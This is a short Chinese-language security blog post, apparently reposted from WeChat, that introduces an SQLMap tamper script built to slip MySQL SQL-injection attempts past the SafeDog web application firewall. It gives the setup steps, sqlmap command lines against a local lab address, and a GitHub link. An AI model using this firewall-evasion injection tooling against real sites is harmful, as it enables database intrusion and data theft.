MySQL注入绕安全狗脚本 -- MySQLByPassForSafeDog

MySQL注入绕安全狗脚本 -- MySQLByPassForSafeDog
2023-2-28 09:11:8 Author: 编码安全研究(查看原文) 阅读量:22 收藏

0x01 工具介绍

此Tamper仅仅适用于MySQL数据库，在SQLMap使用过程中添加参数--tamper=MySQLByPassForSafeDog。

0x02 安装与使用

1、安装网站安全狗Apache最新版

2、启用安全狗，不加MySQLByPassForSafeDog绕狗Tamper:

python sqlmap.py -u "http://192.168.2.3:60001/sqli.php?id=1" --random-agent --dbms=mysql

3、启用安全狗，添加MySQLByPassForSafeDog绕狗Tamper:

python sqlmap.py -u "http://192.168.2.3:60001/sqli.php?id=1" --random-agent --dbms=mysql --tamper=MySQLByPassForSafeDog

4、绕过POC

可以添加参数-v 3进行学习查看

python sqlmap.py -u "http://192.168.2.3:60001/sqli.php?id=1" --random-agent --dbms=mysql --tamper=MySQLByPassForSafeDog -v 3

0x03 下载地址

项目地址：https://github.com/Tas9er/MySQLByPassForSafeDog

注：如有侵权请联系删除

学习更多技术，关注我：

觉得文章不错给点个‘再看’吧。

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2NDY1MDc2Mg==&mid=2247501266&idx=1&sn=c3db3868b71f4b1a97c6c53b2113e272&chksm=ce6496b7f9131fa1798d8fe7a79ba9d067f80f3254c6f76fa528dc7faab5b6899e9cb702e516#rd
如有侵权请联系:admin#unsafe.sh